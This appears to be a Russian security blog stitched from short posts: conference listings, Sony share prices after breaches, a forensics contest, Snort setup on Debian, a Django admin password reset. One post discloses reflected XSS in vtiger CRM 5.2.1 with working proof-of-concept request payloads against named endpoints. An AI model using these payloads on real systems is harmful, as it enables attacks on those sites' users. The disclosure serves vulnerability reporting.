Top 5 мероприятий по ИБ на ближайшее полугодие

  1. IV Межбанковская конференция " УРАЛЬСКИЙ ФОРУМ: ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ БАНКОВ " — 13-18 февраля — Магнитогорск
  2. РусКрипто — 28-31 марта — Москва
  3. Межотраслевой форум директоров по ИБ — 19-20 апреля — Москва
  4. Positive Hack Days — 30-31 мая — Москва
  5. IT & Security Forum — июнь — Казань.




  6. Еще парочка
  7. PCI DSS Russia — пройдет марта в Москве.
  8. IDC IT Security Roadshow в Москве

Влияет ли информационная безопасность на компании в России?

Как падали цены на акции Sony после взломов?
Вот тут написано: attrition.org/security/rant/sony_aka_sownage.html как падали цены на акции компании Sony.

Прошу заменить,
что в 2011-04-04 цена была 31.45$,
а 2011-12-19(сегодня) — 16,71$ = чистая случайность грубо говоря в 50%?

Кто-то мне сказал, что на репутацию компаний создающих сайты, такие взломы никак не влияют.
Интересно, а будут ли заказывать крупные компании, интернет магазины и финансовые компании — доверять держать персональные данные клиентов на сервере, где не уделяется внимание информационной безопасности и разработке ПО. Конечно сайты визитки клепать и верстку менять — не считается.

Стоит ли доверять разработку продукта — компании которая засветилась в небрежном отношении к прошлым своим продуктам?

Конкурс по расследованию IT-инцидентов

Конкурс по расследованию IT-инцидентов

Конкурс по расследованию IT-инцидентов

Совместно с Group-IB мы проводим конкурс по компьютерной криминалистике. Победитель получит возможность работать в Лаборатории Group-IB и заниматься интересной работой по расследованию IT-инцидентов в отличной компании.

На экспертизу поступили два образа носителей информации и только вам под силу пролить свет на произошедшие инциденты. Ответьте на поставленные вопросы и укажите иные сведения, которые помогут в расследовании инцидентов информационной безопасности.

Читать дальше →

PHD 2012 Positive Hack Days - международный форум, посвященный практическим вопросам информационной безопасности.

Positive Hack Days 2012Теперь хочу сюда

Сегодня как никогда остро назрела необходимость конструктивного диалога между всеми представителями сферы информационной безопасности. Поэтому мы разработали мероприятие принципиально нового формата — Positive Hack Days.

Positive Hack Days — уникальное мероприятие для не только в России, но и в мире. Только здесь элита хакерского мира, лидеры индустрии безопасности и Интернет-сообщество встречаются лицом к лицу, чтобы вместе найти ответы на самые актуальные вопросы ИТ-рынка.

Positive Hack Days — это теория, тесно переплетенная с практикой, профессиональная дискуссия в сочетании с захватывающими соревнованиями и конкурсами, максимум практики и минимум формальностей.

Почти побывал на ZeroNights

ZeroNights — международная конференция, посвященная техническим аспектам информационной безопасности. На конференции выступят известные эксперты отрасли из России, США, Индии, Сингапура и других стран. Главная цель конференции — распространение информации о новых методах атак, угроз и защиты от них, а кроме того — создание площадки для общения специалистов-практиков по ИБ.

Эта конференция для технических специалистов, администраторов, руководителей и сотрудников службы ИБ, пентестеров, программистов, и всех тех, кто интересуется техническими проблемами отрасли.

Поблагодарили меня за это habrahabr.ru/company/yandex/blog/131199/

Жаль что живу от Питера и Москвы далеко. Так бы ездил на конференции.
Спасибо замечательной девушке-хакеру Проксима, за предоставленные фотки

Кликабельно
Бабичев Игорь HiMiC ZeroNights

Читать дальше →

Debian snont настройка

Официальная документация по настройке www.snort.org/assets/167/deb_snort_howto.pdf

Change these lines:
Line #39 — ipvar HOME_NET 192.168.1.0/24 – make this match your internal (friendly) network
Line #42 — ipvar EXTERNAL_NET !$HOME_NET
Line #80 — var RULE_PATH ./rules – this assumes /etc/snort/rules
Line #186-#190 comment out all of the preprocessor normalize_ lines
Line #366 — add this: output unified2: filename snort.log, limit 128
Line #395 — delete or comment out all of the “include $RULE_PATH” lines except “local.rules”

для новой версии snort-2.9.1.tar.gz

Change these lines:
Line #45 — ipvar HOME_NET 192.168.1.0/24 – make this match your internal (friendly) network
Line #48 — ipvar EXTERNAL_NET !$HOME_NET
Line #98 — var RULE_PATH ./rules – this assumes /etc/snort/rules
Line #235-#239 comment out all of the preprocessor normalize_ lines
Line #471 — add this: output unified2: filename snort.log, limit 128
Line #503 — delete or comment out all of the “include $RULE_PATH” lines except “local.rules”

./configure --with-mysql --with-libpcre-libraries=/usr/src/snort/libdnet-1.12/src/.libs/ --with-dnet-includes=/usr/src/snort/libdnet-1.12/include/ --enable-build-dynamic-examples --enable-gre --enable-reload --enable-linux-smp-stats --enable-zlib --enable-dynamicplugin --enable-perfprofiling --enable-ipv6

vtiger CRM 5.2.1 XSS

XSS

/include/SalesPlatform/NetIDNA/example.php/>"><ScRiPt>alert(14227)</ScRiPt>


decoded

/include/SalesPlatform/NetIDNA/example.php?decoded=%22%20onmouseover%3dprompt%28981290%29%20bad%3d%22&encode=Encode%20%3e%3e&idn_version=2003


encoded

/include/SalesPlatform/NetIDNA/example.php?decode=%3c%3c%20Decode&encoded=%22%20onmouseover%3dprompt%28937322%29%20bad%3d%22


lang


/include/SalesPlatform/NetIDNA/example.php?decode=&encode=&idn_version=&lang=%22%20onmouseover%3dprompt%28959182%29%20bad%3d%22


_operation

/modules/Mobile/index.php?_operation=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922731%29%3c%2fScRiPt%3e


service

/vtigerservice.php?service=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28945713%29%3c%2fScRiPt%3e


Читать дальше →

О программировании

Если честно, мне нравится программировать. Единственное что меня смущает — мне нравится программировать исключительно для себя, для своего личного удовлетворения, а не на заказ. Заказы на программинг я не беру по двум причинам: во первых стоят сроки, и я должен к ним успеть, и я боюсь подвести людей, потому и не берусь.
Программить за обычное, стандартное бабло мне просто не интересно. Гораздо интереснее помочь кому-нибудь в интернете сделать что-то за просто так.

А вот что мне нравится больше чем программирование, так это давать людям новые знания. Мне нравится, когда меня спрашивают, что и как нужно сделать, чтобы добиться наилучшего результата. А еще больше — когда моим советам следуют. Наверное, это нормально :)

Сброс забытого пароля админа Django

Что делать, если Вы забыли админ-пароль от системы администрирования Django? Все очень просто. Даже не придется лезть в базу данных. В шелле (./manage.py shell) делаем:

from django.contrib.auth.models import User
user = User.objects.get( username=«admin» )
user.set_password(«mynewpassword»)
user.save()


Вуаля!

anisimov.org/pub/django-reset-admin-password